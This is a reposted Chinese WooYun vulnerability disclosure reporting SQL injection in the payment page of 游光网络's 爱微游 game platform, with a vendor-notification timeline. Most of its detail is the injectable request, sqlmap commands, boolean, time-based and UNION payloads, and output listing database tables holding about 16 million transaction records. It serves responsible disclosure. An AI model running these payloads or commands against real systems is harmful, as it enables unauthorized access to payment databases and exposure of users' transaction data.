神刀安全网

漏洞标题: 游光网络爱微游平台某处SQL注入可UNION(泄漏1600万交易记录)

漏洞详情

披露状态:

2016-05-02: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

RT

详细说明:

code 区域
http://**.**.**.**/

游光网络是微信游戏比较火的开发商,允许微信不用注册直接登录玩,目前比较火的游戏有 怪兽必须死 勇士之塔 三国浮生记 都允许用微信直接支付充值 我查看了一下交易记录 每一秒都有7/8单充值记录 虽然都是小金额2块5块,但是一天下来收入统计还是很可观

注入点在web充值页面

code 区域
http://**.**.**.**/pay/alipay2/

mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8

放sqlmap跑

code 区域
sqlmap -u 'http://**.**.**.**/pay/alipay2/

mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id'
_
___ ___| |_____ ___ ___ {**.**.**.**#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:46:06

[20:46:07] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:46:08] [INFO] resuming back-end DBMS 'mysql'
[20:46:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
---
[20:46:08] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12

漏洞证明:

数据库

code 区域
sqlmap -u 'http://**.**.**.**/pay/alipay2/

mask 区域
*****yap*****

?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id' -D money --tables --count
_
___ ___| |_____ ___ ___ {**.**.**.**#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://**.**.**.**

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:47:00

[20:47:00] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
[20:47:01] [INFO] resuming back-end DBMS 'mysql'
[20:47:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: product_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
---
[20:47:01] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
[20:47:01] [INFO] fetching tables for database: 'money'
[20:47:01] [INFO] the SQL query used returns 19 entries
[20:47:01] [INFO] resumed: channel_tradeno
[20:47:01] [INFO] resumed: cp_trans
[20:47:01] [INFO] resumed: distr_stat
[20:47:01] [INFO] resumed: distr_sum
[20:47:01] [INFO] resumed: game_v2
[20:47:01] [INFO] resumed: marchant
[20:47:01] [INFO] resumed: mch_func_priv
[20:47:01] [INFO] resumed: mch_games
[20:47:01] [INFO] resumed: mch_priv
[20:47:01] [INFO] resumed: online
[20:47:01] [INFO] resumed: product_sum
[20:47:01] [INFO] resumed: product_v2
[20:47:01] [INFO] resumed: register
[20:47:01] [INFO] resumed: sum
[20:47:01] [INFO] resumed: talking_data_result
[20:47:01] [INFO] resumed: trans
[20:47:01] [INFO] resumed: trans_back
[20:47:01] [INFO] resumed: user_channel_sum
[20:47:01] [INFO] resumed: user_channel_trans
Database: money
[19 tables]
+---------------------+
| sum |
| channel_tradeno |
| cp_trans |
| distr_stat |
| distr_sum |
| game_v2 |
| marchant |
| mch_func_priv |
| mch_games |
| mch_priv |
| online |
| product_sum |
| product_v2 |
| register |
| talking_data_result |
| trans |
| trans_back |
| user_channel_sum |
| user_channel_trans |
+---------------------+

[20:47:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
Database: money
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| trans | 16486615 |
| trans_back | 14759999 |
| online | 7397218 |
| cp_trans | 113319 |
| product_sum | 27005 |
| `sum` | 15403 |
| talking_data_result | 11257 |
| user_channel_sum | 3924 |
| distr_sum | 2431 |
| channel_tradeno | 1776 |
| product_v2 | 687 |
| distr_stat | 571 |
| mch_games | 150 |
| game_v2 | 89 |
| marchant | 78 |
| register | 45 |
| mch_priv | 5 |
| mch_func_priv | 1 |
+---------------------+---------+

1600W交易记录

修复方案:

过滤

版权声明:转载请注明来源 我在不想理你@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 游光网络爱微游平台某处SQL注入可UNION(泄漏1600万交易记录)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址